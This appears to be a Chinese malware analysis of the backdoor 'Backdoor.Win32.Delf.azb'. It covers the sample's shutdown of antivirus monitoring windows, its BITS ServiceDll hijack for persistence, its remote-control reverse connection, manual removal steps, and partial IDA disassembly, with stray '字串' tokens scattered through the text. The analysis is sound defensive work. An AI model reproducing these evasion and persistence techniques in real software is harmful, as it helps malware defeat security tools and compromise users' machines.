Backdoor.Win32.Delf.azb
病毒名称:Backdoor.Win32.Delf.azb (Kaspersky)
病毒大小:343661 bytes
加壳方式:BINARYRES
样本MD5:ccb23ce816ba0d9ec4d07729bda18481
样本SHA1:cbfba1fc9b4b03ab0675aba013d9108978d491b1
编写语言:Borland Delphi 6.0 - 7.0 字串4
技术分析:
病毒运行后,首先查找AVP.AlertDialog和360SafeMonClass窗口并枚举所有子窗口。尝试关闭360安全卫士监控和卡吧的主动防御窗口,并调用SendMessageA模拟鼠标操作,试图点击窗口出现的“允许”按钮,如果不成功,则模拟“跳过”,否则强制关闭监控窗口。
字串3
释放文件:
%system32%\\adbits.dll
字串3
替换系统正常的BITS服务:
[HKLM\\SYSTEM\\CurrentControlSet\\Services\\BITS\\Parameters\\ServiceDll]
原值:%system32%\\qmgr.dll
改为:%system32%\\adbits.dll
BITS服务简单描述:后台智能传输服务 (BITS)是新版本的 Microsoft Windows Update 和自动更新服务的必需组件。BITS 2.0 可提高文件传输的速度,改进恢复功能并减少网络带宽损耗,支持连线自动启动和断点续传的功能.用闲置网络带宽在后台传输文件。如果此服务被禁用,那么任何依赖于 BITS 的功能,例如 Windows Update 或 MSN Explorer,都将不能自动下载程序和其它信息。
详细的信息请参考:http://msdn2.microsoft.com/en-us/library/aa362827.aspx
字串8
释放批处理删除自身
字串1
对adbits.dll调试还会发现小熊技术论坛远控信息,判断操作系统版本,遍历注册表,判断是否主机,读取日志,记录在LOG文件,利用宿主反弹连接接收远程指令...水平有限,又对服务器不了解,所以还有很多不明白的地方。 字串9
手动清除方法:
1,用IS(冰刃)强制删除:
字串6
%system32%\\adbits.dll
字串9
2,改回被修改的注册表值:
[HKLM\\SYSTEM\\CurrentControlSet\\Services\\BITS\\Parameters\\ServiceDll]
%system32%\\adbits.dll
字串6
改为:%system32%\\qmgr.dll
字串3
附上部分IDA代码:
0040425E mov eax, [ebp+var_204]
00404264 mov edx, offset s_Avp_button ; "AVP.Button"
00404269 call sub_4038F0
字串8
00404414 push ebp
00404415 mov ebp, esp
00404417 push 0 ; lpWindowName
00404419 push offset ClassName ; "AVP.Product_Notification"
0040441E call FindWindowA 字串4
0040441E
00404423 test eax, eax
00404425 jz short loc_404439
00404425
00404427 push 0 ; lParam
00404429 push 0F060h ; wParam
0040442E push 112h ; Msg 字串9
00404433 push eax ; hWnd
00404434 call SendMessageA
00404434
00404439
00404439 loc_404439: ; CODE XREF: fptc+11 j
00404439 push 0 ; lpWindowName
字串6
0040443B push offset s_Q360safemoncl ; "Q360SafeMonClass"
00404440 call FindWindowA
00404440
00404445 test eax, eax
00404447 jz short loc_40445B
00404447
00404449 push 0 ; lParam 字串6
0040444B push 0F060h ; wParam
00404450 push 112h ; Msg
00404455 push eax ; hWnd
00404456 call SendMessageA 字串9
00404456
0040445B
0040445B loc_40445B: ; CODE XREF: fptc+33 j
0040445B push 0 ; lpWindowName
0040445D push offset s_Avp_alertdial ; "AVP.AlertDialog"
00404462 call FindWindowA
00404462
00404467 test eax, eax 字串6
00404469 jz short loc_404478
00404469
0040446B push 0 ; lParam
0040446D push offset EnumFunc ; lpEnumFunc
00404472 push eax ; hWndParent 字串1
00404473 call EnumChildWindows
00404473
00404478
00404478 loc_404478: ; CODE XREF: fptc+55 j
00404478 pop ebp
00404479 retn 14h
00404479
00404479 fptc endp
字串5
ODE:004050A0 s_Bits db ''''BITS'''',0 ; DATA XREF: 00404EB5 o
004050A0 ; 00404EC4 o
004050A0 ; loc_404F81 o
004050A0 ; 00404F90 o 字串9
004050A0 ; loc_404FFF o
004050A0 ; 0040500E o ...
004050A5 align 4
004050A8 s_FreeDllDone db ''''Free DLL Done!'''',0 ; DATA XREF: 00404F20 o
004050A8 ; sub_4506E4+3E r
字串1
004050B7 align 4
004050B8 dd 0FFFFFFFFh
004050BC dword_4050BC dd 7 ; DATA XREF: sub_4506E4+36 r
004050C0 dword_4050C0 dd 2E646D63h, 657865h ; DATA XREF: 00404F48 o
004050C8 dword_4050C8 dd 0BBBBE6CCh, 0F1CEFEB7h ; DATA XREF: 00404F9E o
004050D0 s_Bits_0 db ''''BITS'''',0 ; DATA XREF: DATA:00450FE4 o
字串1
004050D0 ; DATA:00451073 r
004050D0 ; DATA:0045108B r
004050D5 align 4
004050D8 s_Servicedll db ''''ServiceDll'''',0 ; DATA XREF: 00404FB5 o
004050D8 ; 00404FCA o 字串8
004050E3 align 4
004050E4 s_SystemCurrent db ''''SYSTEM\\CurrentControlSet\\Services\\BITS\\Parameters'''',0
004050E4 ; DATA XREF: 00404FBA o
00405116 align 4
00405118 s_SystemControl db ''''SYSTEM\\ControlSet003\\Services\\BITS\\Parameters'''',0
00405118 ; DATA XREF: 00404FCF o 字串2
00405146 align 4
00405148 dd 0FFFFFFFFh, 12h
00405150 s_StartDllServi db ''''Start DLL Service:'''',0 ; DATA XREF: 00404FE7 o
00405163 align 4
00405164 dd 0FFFFFFFFh, 0Fh
0040516C s_Cmd_exeCDel db ''''cmd.exe /c del '''',0 ; DATA XREF: 00405033 o
0040517C db 3 dup(0)
0040517F db ?
字串5
00405180 dd 20h dup(?)
00405180 CODE ends
字串6
0043E31D align 10h
0043E320 dd 0FFFFFFFFh, 1
0043E328 dword_43E328 dd 20h, 0FFFFFFFFh, 10h ; DATA XREF: sub_43E1A4+B3 o
0043E334 s_B db ''''小熊技术论坛远控'''',0 ; DATA XREF: sub_43E1A4+11C o
0043E345 align 4 字串6
0043ECF4 s_WindowsServer db ''''Windows Server 2003'''',0 ; DATA XREF: sub_43EB1C+B1 o
0043ED08 db 0FFh,0FFh,0FFh,0FFh,0Dh,0
0043ED0E align 10h
0043ED10 s_WindowsVista db ''''Windows Vista'''',0 ; DATA XREF: sub_43EB1C+BF o
0043ED1E align 10h
0043ED20 db 0FFh,0FFh,0FFh,0FFh,0Ah,0
0043ED26 align 4
0043ED28 s_Windows95 db ''''Windows 95'''',0 ; DATA XREF: sub_43EB1C+E4 o 字串3
0043ED33 align 4
0043ED34 db 0FFh,0FFh,0FFh,0FFh,0Ah,0
0043ED3A align 4
0043ED3C s_Windows98 db ''''Windows 98'''',0 ; DATA XREF: sub_43EB1C+F2 o
0043ED47 align 4
0043ED48 db 0FFh,0FFh,0FFh,0FFh,0Ah,0
0043ED4E align 10h 字串3
0043ED50 s_WindowsMe db ''''Windows Me'''',0 ; DATA XREF: sub_43EB1C+100 o
0043ED5B align 4
0043ED5C dd 0FFFFFFFFh, 1
0043ED64 dword_43ED64 dd 20h ; DATA XREF: sub_43EB1C+128 o
字串3